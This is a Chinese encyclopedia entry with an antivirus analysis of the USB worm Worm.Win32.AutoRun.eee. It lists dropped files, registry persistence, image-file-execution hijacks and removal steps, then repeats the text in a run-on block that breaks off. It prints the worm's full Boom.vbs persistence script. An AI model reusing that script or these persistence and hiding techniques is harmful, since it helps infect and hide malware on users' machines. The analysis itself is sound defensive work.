“Worm.Win32.AutoRun.eee”的意思、由来-中文百科全书

病毒标签

病毒名称： Worm.Win32.AutoRun.eee

中文名称： U盘寄生虫变种

病毒类型：蠕虫

文件 MD5： E4EFBDEEEDF0294E380578767D7217F3

公开范围：完全公开

危害等级： 4

文件长度： 237,568 字节

感染系统： Windows98以上版本

开发工具： Microsoft Visual Basic 5.0 / 6.0

加壳类型：无

该病毒为蠕虫类。病毒运行后释放文件到系统目录下，自动打开病毒运行时所在路径的文件夹，采用U盘寄生虫技术在各个逻辑磁盘根目录下创建autorun.inf与MS-DOS.com文件，达到中毒机器在常态下病毒文件的传播；病毒的启动方式采用多样化，即使病毒在注册表中的启动项被删除，病毒还可以被启动；双重文件隐藏保护，设置文件夹选项中的隐藏系统保护文件选项不可用及隐藏指定后缀名文件；伪装及映像劫持技术，映像劫持多个系统关键进程文件，将病毒文件伪装成系统更新文件以及注册表打开程序等；病毒文件

采用文件夹图标并在系统备份文件夹内建立与病毒相应名称的系统文件，让用户认为其是正常的系统文件，以达到混淆视听的目的；保持中毒原有状态，对开机关机优化设置，使得开关机速度提升，使用户感觉不到因为机器中毒拖慢系统；病毒采用进程互锁技术，病毒完全运行后创建多个进程，各进程互相保护。

行为分析

本地行为：

1、文件运行后会衍生以下文件：

%DriveLetter%\\autorun.inf

%Temp%\\~DF7634.tmp

%Temp%\\~DF8840.tmp

%Temp%\\~DF9A47.tmp

%DriveLetter%\\MS-DOS.com

%Windir%\\Cursors\\Boom.vbs

%Windir%\\Fonts\\Fonts.exe

%Windir%\\Fonts\\tskmgr.exe

%Windir%\\Media\\rndll32.pif

%Windir%\\pchealth\\Global.exe

%Windir%\\pchealth\\helpctr\\binaries\\HelpHost.com

%Windir%\\system\\KEYBOARD.exe

%System32%\\dllcache\\autorun.inf

%System32%\\dllcache\\Default.exe

%System32%\\dllcache\\Global.exe

%System32%\\dllcache\\Recycler.{645FF040-5081-101B-9F08-

00AA002F954E}\\Global.exe

%System32%\\dllcache\\Recycler.{645FF040-5081-101B-9F08-

00AA002F954E}\\svchost.exe

%System32%\\dllcache\\Recycler.{645FF040-5081-101B-9F08-

00AA002F954E}\\system.exe

%System32%\\dllcache\\rndll32.exe

%System32%\\dllcache\\svchost.exe

%System32%\\dllcache\\tskmgr.exe

%System32%\\drivers\\drivers.cab.exe

%System32%\\regedit.exe

2、修改注册表：

HKEY_CURRENT_USER\\Control Panel

\\Desktop\\SCRNSAVE.EXE

新: 字符串: "C:\\WINDOWS\\pchealth\\helpctr

\\binaries\\HelpHost.com"

旧: 字符串: "C:\\WINDOWS\\system32\\logon.scr"

描述：设置屏幕保护为病毒文件

HKEY_CURRENT_USER\\Software\\Microsoft

\\Windows\\CurrentVersion\\Explorer

\\Advanced\\ShowSuperHidden

新: DWORD: 0 (0)

旧: DWORD: 1 (0x1)

描述：修改文件夹不可见隐藏文件

HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes

\\MSCFile\\Shell\\Open\\Command\\@

新: 字符串: "C:\\WINDOWS\\Fonts\\Fonts.exe"

旧: 字符串： %SystemRoot%\\system32\\mmc.exe "%1"

描述：修改在运行命令中输入mmc.exe时候运行病毒

HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes

\\regfile\\shell\\open\\command\\@

新: 字符串: "C:\\WINDOWS\\pchealth\\Global.exe"

旧: 字符串: "regedit.exe "%1""

描述：修改在运行命令中输入regedit.exe时候运行病毒

HKEY_CURRENT_USER\\Software\\Microsoft

\\Windows\\CurrentVersion\\RunOnce\\@

键值: 字符串: "C:\\WINDOWS\\system32\\dllcache\\Default.exe"

描述：添加启动项

HKEY_CURRENT_USER\\Software\\Microsoft

\\Windows\\ShellNoRoam\\MUICache\\C:\\WINDOWS

\\system32\\dllcache\\Recycler.

{645FF040-5081-101B-9F08-00AA002F954E}\\Global.exe

键值: 字符串: "Global"

描述：添加启动项

HKEY_CURRENT_USER\\Software\\Microsoft

\\Windows\\ShellNoRoam\\MUICache\\C:\\WINDOWS

\\system32\\dllcache\\Recycler.

{645FF040-5081-101B-9F08-00AA002F954E}\\svchost.exe

键值: 字符串: "svchost"

描述：添加启动项

HKEY_CURRENT_USER\\Software\\Microsoft

\\Windows\\ShellNoRoam\\MUICache\\C:\\WINDOWS

\\system32\\dllcache\\Recycler.

{645FF040-5081-101B-9F08-00AA002F954E}\\system.exe

键值: 字符串: "system"

描述：添加启动项

HKEY_CURRENT_USER\\Software\\Policies

\\Microsoft\\Windows\\System\\Scripts\\Logoff\\0\\0\\Script

键值: 字符串: "C:\\WINDOWS\\Cursors\\Boom.vbs"

描述：系统注销时启动病毒脚本

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft

\\Windows NT\\CurrentVersion

\\Image File Execution Options\\auto.exe\\Debugger

键值: 字符串: "C:\\WINDOWS\\system32\\drivers\\drivers.cab.exe"

描述：添加映像劫持项

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft

\\Windows NT\\CurrentVersion

\\Image File Execution Options\\boot.exe\\Debugger

键值: 字符串: "C:\\WINDOWS\\Fonts\\fonts.exe"

描述：添加映像劫持项

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft

\\Windows NT\\CurrentVersion

\\Image File Execution Options\\msconfig.exe\\Debugger

键值: 字符串: "C:\\WINDOWS\\Media\\rndll32.pif"

描述：添加映像劫持项

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft

\\Windows NT\\CurrentVersion

\\Image File Execution Options\\procexp.exe\\Debugger

描述：添加映像劫持项

键值: 字符串: "C:\\WINDOWS\\pchealth\\helpctr

\\binaries\\HelpHost.com"

描述：添加映像劫持项

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft

\\Windows NT\\CurrentVersion\\Image File Execution Options

\\taskmgr.exe\\Debugger

键值: 字符串: "C:\\WINDOWS\\Fonts\\tskmgr.exe"

描述：添加映像劫持项

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft

\\Windows\\CurrentVersion\\policies\\Explorer\\Run\\sys

键值: 字符串: "C:\\WINDOWS\\Fonts\\Fonts.exe"

描述：添加启动项

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft

\\Windows\\CurrentVersion\\Run\\@

键值: 字符串: "C:\\WINDOWS\\system\\KEYBOARD.exe"

描述：添加启动项

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft

\\Windows\\CurrentVersion\\RunOnce\\@

键值: 字符串: "C:\\WINDOWS\\system32\\dllcache\\Default.exe"

描述：添加启动项

HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies

\\Microsoft\\Windows\\System\\Scripts

\\Shutdown\\0\\0\\Script

键值: 字符串: "C:\\WINDOWS\\Cursors\\Boom.vbs"

描述：系统关闭时启动病毒脚本

HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies

\\Microsoft\\Windows\\System\\Scripts

\\Startup\\0\\0\\Script

键值: 字符串: "C:\\WINDOWS\\Cursors\\Boom.vbs"

描述：系统启动时启动病毒脚本

3. 利用vbs脚本在中毒机器注销、关机、启动进行病毒文件复制及启动项的添加，Boom.vbs文件：

dim fs,rg

set fs = createobject("scripting.filesystemobject")

set rg = createobject("wscript.shell")

on error resume next

rg.regwrite "HKCR\\.vbs\\", "VBSFile"

rg.regwrite "HKCU\\Control Panel\\Desktop\\SCRNSAVE.EXE", "

C:\\WINDOWS\\pchealth\\helpctr\\binaries\\HelpHost.com"

rg.regwrite "HKCU\\Control Panel\\Desktop\\ScreenSaveTimeOut", "30"

rg.regwrite "HKCR\\MSCFile\\Shell\\Open\\Command\\",

"C:\\WINDOWS\\pchealth\\Global.exe"

rg.regwrite "HKCR\\regfile\\Shell\\Open\\Command\\",

"C:\\WINDOWS\\pchealth\\Global.exe"

rg.regwrite "HKLM\\SOFTWARE\\Microsoft\\Windows

\\CurrentVersion\\RunOnce\\",

"C:\\WINDOWS\\system32\\dllcache\\Default.exe"

rg.regwrite "HKCU\\SOFTWARE\\Microsoft\\Windows

\\CurrentVersion\\RunOnce\\",

"C:\\WINDOWS\\system32\\dllcache\\Default.exe"

rg.regwrite "HKLM\\SOFTWARE\\Microsoft

\\Windows\\CurrentVersion\\Run\\",

"C:\\WINDOWS\\system\\KEYBOARD.exe"

rg.regwrite "HKEY_CLASSES_ROOT\\MSCFile

\\Shell\\Open\\Command\\",

"C:\\WINDOWS\\Fonts\\Fonts.exe"

rg.regwrite "HKCU\\Software\\Policies\\Microsoft

\\Windows\\System\\Scripts\\Logoff\\0\\DisplayName",

"Local Group Policy"

rg.regwrite "HKCU\\Software\\Policies\\Microsoft

\\Windows\\System\\Scripts\\Logoff\\0\\FileSysPath",""

rg.regwrite "HKCU\\Software\\Policies\\Microsoft

\\Windows\\System\\Scripts\\Logoff\\0\\GPO-ID","LocalGPO"

rg.regwrite "HKCU\\Software\\Policies\\Microsoft

\\Windows\\System\\Scripts\\Logoff\\0\\GPOName","Local Group Policy"

rg.regwrite "HKCU\\Software\\Policies\\Microsoft

\\Windows\\System\\Scripts\\Logoff\\0\\SOM-ID","Local"

rg.regwrite "HKCU\\Software\\Policies\\Microsoft

\\Windows\\System\\Scripts\\Logoff\\0\\0\\Parameters",""

rg.regwrite "HKCU\\Software\\Policies\\Microsoft\\Windows\\System

\\Scripts\\Logoff\\0\\0\\Script","C:\\WINDOWS\\Cursors\\Boom.vbs"

rg.regwrite "HKLM\\Software\\Policies\\Microsoft

\\Windows\\System\\Scripts\\Shutdown\\0\\DisplayName",

"Local Group Policy"

rg.regwrite "HKLM\\Software\\Policies\\Microsoft

\\Windows\\System\\Scripts\\Shutdown\\0\\FileSysPath", ""

rg.regwrite "HKLM\\Software\\Policies\\Microsoft

\\Windows\\System\\Scripts\\Shutdown\\0\\GPO-ID", "LocalGPO"

rg.regwrite "HKLM\\Software\\Policies\\Microsoft

\\Windows\\System\\Scripts\\Shutdown\\0\\GPOName",

"Local Group Policy"

rg.regwrite "HKLM\\Software\\Policies\\Microsoft

\\Windows\\System\\Scripts\\Shutdown\\0\\SOM-ID", "Local"

rg.regwrite "HKLM\\Software\\Policies\\Microsoft

\\Windows\\System\\Scripts\\Shutdown\\0\\0\\Parameters", ""

rg.regwrite "HKLM\\Software\\Policies\\Microsoft

\\Windows\\System\\Scripts\\Shutdown\\0\\0\\Script",

"C:\\WINDOWS\\Cursors\\Boom.vbs"

rg.regwrite "HKLM\\Software\\Policies\\Microsoft

\\Windows\\System\\Scripts\\Startup\\0\\DisplayName",

"Local Group Policy"

rg.regwrite "HKLM\\Software\\Policies\\Microsoft

\\Windows\\System\\Scripts\\Startup\\0\\FileSysPath", ""

rg.regwrite "HKLM\\Software\\Policies\\Microsoft

\\Windows\\System\\Scripts\\Startup\\0\\GPO-ID", "LocalGPO"

rg.regwrite "HKLM\\Software\\Policies\\Microsoft

\\Windows\\System\\Scripts\\Startup\\0\\GPOName",

"Local Group Policy"

rg.regwrite "HKLM\\Software\\Policies\\Microsoft

\\Windows\\System\\Scripts\\Startup\\0\\SOM-ID", "Local"

rg.regwrite "HKLM\\Software\\Policies\\Microsoft

\\Windows\\System\\Scripts\\Startup\\0\\0\\Parameters", ""

rg.regwrite "HKLM\\Software\\Policies\\Microsoft

\\Windows\\System\\Scripts\\Startup\\0\\0\\Script",

"C:\\WINDOWS\\Cursors\\Boom.vbs"

If Not fs.fileexists("C:\\WINDOWS\\Fonts\\Fonts.exe")

Then fs.copyfile ("C:\\WINDOWS\\Help\\microsoft.hlp"),

("C:\\WINDOWS\\Fonts\\Fonts.exe")

If Not fs.fileexists("C:\\WINDOWS\\pchealth\\helpctr

\\binaries\\HelpHost.com") Then fs.copyfile

("C:\\WINDOWS\\Help\\microsoft.hlp"),

("C:\\WINDOWS\\pchealth\\helpctr\\binaries\\HelpHost.com")

If Not fs.fileexists("C:\\WINDOWS\\pchealth\\Global.exe")

Then fs.copyfile ("C:\\WINDOWS\\Help\\microsoft.hlp"),

("C:\\WINDOWS\\pchealth\\Global.exe")

If Not fs.fileexists("C:\\WINDOWS\\system\\KEYBOARD.exe")

Then fs.copyfile ("C:\\WINDOWS\\Help\\microsoft.hlp"),

("C:\\WINDOWS\\system\\KEYBOARD.exe")

If Not fs.fileexists("C:\\WINDOWS\\system32\\dllcache

\\Default.exe") Then fs.copyfile

("C:\\WINDOWS\\Help\\microsoft.hlp"),

("C:\\WINDOWS\\system32\\dllcache\\Default.exe")

If Not fs.fileexists("C:\\windows\\system32

\\drivers\\drivers.cab.exe") Then fs.copyfile

("C:\\WINDOWS\\Help\\microsoft.hlp"),

("C:\\windows\\system32\\drivers\\drivers.cab.exe ")

If Not fs.fileexists("C:\\windows\\media\\rndll32.pif ")

Then fs.copyfile ("C:\\WINDOWS\\Help\\microsoft.hlp"),

("C:\\windows\\media\\rndll32.pif")

If Not fs.fileexists("C:\\windows\\fonts\\tskmgr.exe")

Then fs.copyfile ("C:\\WINDOWS\\Help\\microsoft.hlp"),

("C:\\windows\\fonts\\tskmgr.exe")

4. 启动方式多样化：

将系统默认屏幕保护程序%System32%\\logon.scr替换成病毒文件%Windir%\\pchealth\\helpctr\\binaries\\HelpHost.com并修改屏幕保护启动时间为30s；在Logoff（注销）、Shutdown（关机）、Startup（启动）中加载病毒脚本%Windir% \\Cursors\\Boom.vbs"，达到保持病毒文件和启动项的完整；修改注册在开机运行项

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows

\\CurrentVersion\\Run、登陆用户运行项

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows

\\CurrentVersion\\RunOnce、系统文件Explorer.exe文件加载项

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows

\\CurrentVersion\\policies\\Explorer\\Run\\sys，

添加了病毒文件的启动。

5. 双重文件隐藏方式：

病毒运行后将衍生文件设置成系统隐藏文件，并修改注册表，隐藏受保护的操作系统：

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows

\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden设置为关；

病毒文件主要以.EXE与.COM为后缀名，

所以设置HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes

\\comfile\everShowExt、

HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\exefile

\everShowExt为关，即使启用系统受保护文件选项为开，

也是看不到病毒文件原型的。

6. 伪装技术加映像劫持：

该病毒将释放文件名设置成regedit.exe、svchost.exe、msconfig.exe、tskmgr.exe、HelpHost.com等来伪装成系统文件，使得用户无法分辨；劫持在运行命令（cmd.exe）中运行regedit.exe与mmc.exe运行病毒文件；映像劫持系统文件ctfmon.exe、msconfig.exe、taskmgr.exe、autorun.exe及系统辅助工具autoruns.exe、auto.exe，达到系统加载以上文件或是运行以上文件时就运行病毒。

7. 混淆视听：

该病毒衍生的文件图标为文件夹图标，误导用户，使用户认为该病毒是文件夹，导致误运行病毒文件；将系统文件%system32%\\taskmgr.exe和%system32%\\rundll32.exe复制到系统备份目录%System32%\\dllcache下，并分别重命名为tskgr.exe和rndll32.pif；病毒衍生文件%Windir%\\Fonts\\tskmgr.exe、%Windir%\\Media\\rndll32.pif；以达到混淆视听的作用。

8. 保持计算机原有状态：

病毒通过修改注册表，进行开机关机优化设置，使得开关机速度提升，使计算机不会因为运行多个病毒文件拖慢系统，修改如下：

HKEY_CURRENT_USER\\Control Panel\\Desktop\\AutoEndTasks

新: 字符串: "1"

旧: 字符串: "

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Dfrg

\\BootOptimizeFunction\\LcnEndLocation

新: 字符串: "642218"

旧: 字符串: "0"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Dfrg

\\BootOptimizeFunction\\LcnStartLocation

新: 字符串: "550001"

旧: 字符串: "0"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Dfrg

\\BootOptimizeFunction\\OptimizeComplete

新: 字符串: "Yes"

旧: 字符串: "No"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Dfrg

\\BootOptimizeFunction\\OptimizeError

新: 字符串: " "

旧: 字符串: "Not Run"

9. 进程互锁：

病毒完全运行后创建Global.exe、svchost.exe、system.exe进程，以达到进程互相保护。

注： %System32% 是一个可变路径。病毒通过查询操作系统来决定当前 System文件夹的位置。

%Windir% WINDODWS所在目录

%DriveLetter%　逻辑驱动器根目录

%ProgramFiles%　系统程序默认安装目录

%HomeDrive% 当前启动的系统的所在分区

%Documents and Settings% 当前用户文档根目录

%Temp% \\Documents and Settings\\当前用户\\Local Settings\\Temp

%System32% 系统的 System32文件夹

Windows2000/NT中默认的安装路径是C:\\Winnt\\System32

windows95/98/me中默认的安装路径是C:\\Windows\\System

windowsXP中默认的安装路径是C:\\Windows\\System32

清除方案

1、使用安天防线可彻底清除此病毒(推荐)，安天防线下载地址：http://www.antiyfx.com/download.htm

2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。

推荐使用ATool（安天安全管理工具），ATool下载地址：http://www.antiy.com/freetools/atool.htm

(1)使用安天防线或ATool中的“进程管理”关闭病毒进程：

强行结束为以下路径的进程：

%System32%\\dllcache\\Recycler.

{645FF040-5081-101B-9F08-00AA002F954E}\\ Global.exe

%System32%\\dllcache\\Recycler.

{645FF040-5081-101B-9F08-00AA002F954E}\\svchost.exe

%System32%\\dllcache\\Recycler.

{645FF040-5081-101B-9F08-00AA002F954E}\\system.exe

(2)强行删除病毒文件：

%DriveLetter%\\autorun.inf

%Temp%\\~DF7634.tmp

%Temp%\\~DF8840.tmp

%Temp%\\~DF9A47.tmp

%DriveLetter%\\MS-DOS.com

%Windir%\\Cursors\\Boom.vbs

%Windir%\\Fonts\\Fonts.exe

%Windir%\\Fonts\\tskmgr.exe

%Windir%\\Media\\rndll32.pif

%Windir%\\pchealth\\Global.exe

%Windir%\\pchealth\\helpctr\\binaries\\HelpHost.com

%Windir%\\system\\KEYBOARD.exe

%System32%\\dllcache\\autorun.inf

%System32%\\dllcache\\Default.exe

%System32%\\dllcache\\Global.exe

%System32%\\dllcache\\Recycler.

{645FF040-5081-101B-9F08-00AA002F954E}\\Global.exe

%System32%\\dllcache\\Recycler.

{645FF040-5081-101B-9F08-00AA002F954E}\\svchost.exe

%System32%\\dllcache\\Recycler.

{645FF040-5081-101B-9F08-00AA002F954E}\\system.exe

%System32%\\dllcache\\rndll32.exe

%System32%\\dllcache\\svchost.exe

%System32%\\dllcache\\tskmgr.exe

%System32%\\drivers\\drivers.cab.exe

%System32%\\regedit.exe

(3)恢复病毒修改的注册表项目，删除病毒添加的注册表项：

HKEY_CURRENT_USER\\Control Panel\\Desktop\\SCRNSAVE.EXE

新: 字符串: "C:\\WINDOWS\\pchealth

\\helpctr\\binaries\\HelpHost.com"

旧: 字符串: "C:\\WINDOWS\\system32\\logon.scr"

描述：设置屏幕保护为病毒文件

HKEY_CURRENT_USER\\Software\\Microsoft

\\Windows\\CurrentVersion\\Explorer

\\Advanced\\ShowSuperHidden

新: DWORD: 0 (0)

旧: DWORD: 1 (0x1)

描述：修改文件夹不可见隐藏文件

HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes

\\MSCFile\\Shell\\Open\\Command\\@

新: 字符串: "C:\\WINDOWS\\Fonts\\Fonts.exe"

旧: 字符串： %SystemRoot%\\system32\\mmc.exe "%1"

描述：修改在运行命令中输入mmc.exe时候运行病毒

HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes

\\regfile\\shell\\open\\command\\@

新: 字符串: "C:\\WINDOWS\\pchealth\\Global.exe"

旧: 字符串: "regedit.exe "%1""

描述：修改在运行命令中输入regedit.exe时候运行病毒

HKEY_CURRENT_USER\\Software\\Microsoft

\\Windows\\CurrentVersion\\RunOnce\\@

键值: 字符串: "C:\\WINDOWS\\system32

\\dllcache\\Default.exe"

描述：添加启动项

HKEY_CURRENT_USER\\Software\\Microsoft

\\Windows\\ShellNoRoam\\MUICache

\\C:\\WINDOWS\\system32\\dllcache\\Recycler.

{645FF040-5081-101B-9F08-00AA002F954E}

\\Global.exe

键值: 字符串: "Global"

描述：添加启动项

HKEY_CURRENT_USER\\Software\\Microsoft

\\Windows\\ShellNoRoam\\MUICache

\\C:\\WINDOWS\\system32\\dllcache\\Recycler.

{645FF040-5081-101B-9F08-00AA002F954E}

\\svchost.exe

键值: 字符串: "svchost"

描述：添加启动项

HKEY_CURRENT_USER\\Software\\Microsoft

\\Windows\\ShellNoRoam\\MUICache

\\C:\\WINDOWS\\system32\\dllcache\\Recycler.

{645FF040-5081-101B-9F08-00AA002F954E}

\\system.exe

键值: 字符串: "system"

描述：添加启动项

HKEY_CURRENT_USER\\Software\\Policies

\\Microsoft\\Windows\\System\\Scripts

\\Logoff\\0\\0\\Script

键值: 字符串: "C:\\WINDOWS\\Cursors\\Boom.vbs"

描述：系统注销时启动病毒脚本

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft

\\Windows NT\\CurrentVersion

\\Image File Execution Options\\auto.exe

\\Debugger

键值: 字符串: "C:\\WINDOWS\\system32

\\drivers\\drivers.cab.exe"

描述：添加映像劫持项

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft

\\Windows NT\\CurrentVersion

\\Image File Execution Options\\boot.exe\\Debugger

键值: 字符串: "C:\\WINDOWS\\Fonts\\fonts.exe"

描述：添加映像劫持项

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft

\\Windows NT\\CurrentVersion

\\Image File Execution Options

\\msconfig.exe\\Debugger

键值: 字符串: "C:\\WINDOWS\\Media\\rndll32.pif"

描述：添加映像劫持项

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft

\\Windows NT\\CurrentVersion

\\Image File Execution Options

\\procexp.exe\\Debugger

描述：添加映像劫持项

键值: 字符串: "C:\\WINDOWS\\pchealth

\\helpctr\\binaries\\HelpHost.com"

描述：添加映像劫持项

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft

\\Windows NT\\CurrentVersion

\\Image File Execution Options

\\taskmgr.exe\\Debugger

键值: 字符串: "C:\\WINDOWS\\Fonts\\tskmgr.exe"

描述：添加映像劫持项

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft

\\Windows\\CurrentVersion\\policies

\\Explorer\\Run\\sys

键值: 字符串: "C:\\WINDOWS\\Fonts\\Fonts.exe"

描述：添加启动项

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft

\\Windows\\CurrentVersion\\Run\\@

键值: 字符串: "C:\\WINDOWS\\system\\KEYBOARD.exe"

描述：添加启动项

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft

\\Windows\\CurrentVersion\\RunOnce\\@

键值: 字符串: "C:\\WINDOWS\\system32

\\dllcache\\Default.exe"

描述：添加启动项

HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies

\\Microsoft\\Windows\\System\\Scripts

\\Shutdown\\0\\0\\Script

键值: 字符串: "C:\\WINDOWS\\Cursors\\Boom.vbs"

描述：系统关闭时启动病毒脚本

HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies

\\Microsoft\\Windows\\System\\Scripts\\Startup\\0\\0\\Script

键值: 字符串: "C:\\WINDOWS\\Cursors\\Boom.vbs"

描述：系统启动时启动病毒脚本

词条	Worm.Win32.AutoRun.eee
释义	病毒标签病毒描述行为分析清除方案病毒标签病毒名称： Worm.Win32.AutoRun.eee 中文名称： U盘寄生虫变种病毒类型：蠕虫文件 MD5： E4EFBDEEEDF0294E380578767D7217F3 公开范围：完全公开危害等级： 4 文件长度： 237,568 字节感染系统： Windows98以上版本开发工具： Microsoft Visual Basic 5.0 / 6.0 加壳类型：无病毒描述该病毒为蠕虫类。病毒运行后释放文件到系统目录下，自动打开病毒运行时所在路径的文件夹，采用U盘寄生虫技术在各个逻辑磁盘根目录下创建autorun.inf与MS-DOS.com文件，达到中毒机器在常态下病毒文件的传播；病毒的启动方式采用多样化，即使病毒在注册表中的启动项被删除，病毒还可以被启动；双重文件隐藏保护，设置文件夹选项中的隐藏系统保护文件选项不可用及隐藏指定后缀名文件；伪装及映像劫持技术，映像劫持多个系统关键进程文件，将病毒文件伪装成系统更新文件以及注册表打开程序等；病毒文件采用文件夹图标并在系统备份文件夹内建立与病毒相应名称的系统文件，让用户认为其是正常的系统文件，以达到混淆视听的目的；保持中毒原有状态，对开机关机优化设置，使得开关机速度提升，使用户感觉不到因为机器中毒拖慢系统；病毒采用进程互锁技术，病毒完全运行后创建多个进程，各进程互相保护。行为分析本地行为： 1、文件运行后会衍生以下文件： %DriveLetter%\\autorun.inf %Temp%\\~DF7634.tmp %Temp%\\~DF8840.tmp %Temp%\\~DF9A47.tmp %DriveLetter%\\MS-DOS.com %Windir%\\Cursors\\Boom.vbs %Windir%\\Fonts\\Fonts.exe %Windir%\\Fonts\\tskmgr.exe %Windir%\\Media\\rndll32.pif %Windir%\\pchealth\\Global.exe %Windir%\\pchealth\\helpctr\\binaries\\HelpHost.com %Windir%\\system\\KEYBOARD.exe %System32%\\dllcache\\autorun.inf %System32%\\dllcache\\Default.exe %System32%\\dllcache\\Global.exe %System32%\\dllcache\\Recycler.{645FF040-5081-101B-9F08- 00AA002F954E}\\Global.exe %System32%\\dllcache\\Recycler.{645FF040-5081-101B-9F08- 00AA002F954E}\\svchost.exe %System32%\\dllcache\\Recycler.{645FF040-5081-101B-9F08- 00AA002F954E}\\system.exe %System32%\\dllcache\\rndll32.exe %System32%\\dllcache\\svchost.exe %System32%\\dllcache\\tskmgr.exe %System32%\\drivers\\drivers.cab.exe %System32%\\regedit.exe 2、修改注册表： HKEY_CURRENT_USER\\Control Panel \\Desktop\\SCRNSAVE.EXE 新: 字符串: "C:\\WINDOWS\\pchealth\\helpctr \\binaries\\HelpHost.com" 旧: 字符串: "C:\\WINDOWS\\system32\\logon.scr" 描述：设置屏幕保护为病毒文件 HKEY_CURRENT_USER\\Software\\Microsoft \\Windows\\CurrentVersion\\Explorer \\Advanced\\ShowSuperHidden 新: DWORD: 0 (0) 旧: DWORD: 1 (0x1) 描述：修改文件夹不可见隐藏文件 HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes \\MSCFile\\Shell\\Open\\Command\\@ 新: 字符串: "C:\\WINDOWS\\Fonts\\Fonts.exe" 旧: 字符串： %SystemRoot%\\system32\\mmc.exe "%1" 描述：修改在运行命令中输入mmc.exe时候运行病毒 HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes \\regfile\\shell\\open\\command\\@ 新: 字符串: "C:\\WINDOWS\\pchealth\\Global.exe" 旧: 字符串: "regedit.exe "%1"" 描述：修改在运行命令中输入regedit.exe时候运行病毒 HKEY_CURRENT_USER\\Software\\Microsoft \\Windows\\CurrentVersion\\RunOnce\\@ 键值: 字符串: "C:\\WINDOWS\\system32\\dllcache\\Default.exe" 描述：添加启动项 HKEY_CURRENT_USER\\Software\\Microsoft \\Windows\\ShellNoRoam\\MUICache\\C:\\WINDOWS \\system32\\dllcache\\Recycler. {645FF040-5081-101B-9F08-00AA002F954E}\\Global.exe 键值: 字符串: "Global" 描述：添加启动项 HKEY_CURRENT_USER\\Software\\Microsoft \\Windows\\ShellNoRoam\\MUICache\\C:\\WINDOWS \\system32\\dllcache\\Recycler. {645FF040-5081-101B-9F08-00AA002F954E}\\svchost.exe 键值: 字符串: "svchost" 描述：添加启动项 HKEY_CURRENT_USER\\Software\\Microsoft \\Windows\\ShellNoRoam\\MUICache\\C:\\WINDOWS \\system32\\dllcache\\Recycler. {645FF040-5081-101B-9F08-00AA002F954E}\\system.exe 键值: 字符串: "system" 描述：添加启动项 HKEY_CURRENT_USER\\Software\\Policies \\Microsoft\\Windows\\System\\Scripts\\Logoff\\0\\0\\Script 键值: 字符串: "C:\\WINDOWS\\Cursors\\Boom.vbs" 描述：系统注销时启动病毒脚本 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows NT\\CurrentVersion \\Image File Execution Options\\auto.exe\\Debugger 键值: 字符串: "C:\\WINDOWS\\system32\\drivers\\drivers.cab.exe" 描述：添加映像劫持项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows NT\\CurrentVersion \\Image File Execution Options\\boot.exe\\Debugger 键值: 字符串: "C:\\WINDOWS\\Fonts\\fonts.exe" 描述：添加映像劫持项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows NT\\CurrentVersion \\Image File Execution Options\\msconfig.exe\\Debugger 键值: 字符串: "C:\\WINDOWS\\Media\\rndll32.pif" 描述：添加映像劫持项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows NT\\CurrentVersion \\Image File Execution Options\\procexp.exe\\Debugger 描述：添加映像劫持项键值: 字符串: "C:\\WINDOWS\\pchealth\\helpctr \\binaries\\HelpHost.com" 描述：添加映像劫持项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows NT\\CurrentVersion\\Image File Execution Options \\taskmgr.exe\\Debugger 键值: 字符串: "C:\\WINDOWS\\Fonts\\tskmgr.exe" 描述：添加映像劫持项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\policies\\Explorer\\Run\\sys 键值: 字符串: "C:\\WINDOWS\\Fonts\\Fonts.exe" 描述：添加启动项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run\\@ 键值: 字符串: "C:\\WINDOWS\\system\\KEYBOARD.exe" 描述：添加启动项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\RunOnce\\@ 键值: 字符串: "C:\\WINDOWS\\system32\\dllcache\\Default.exe" 描述：添加启动项 HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies 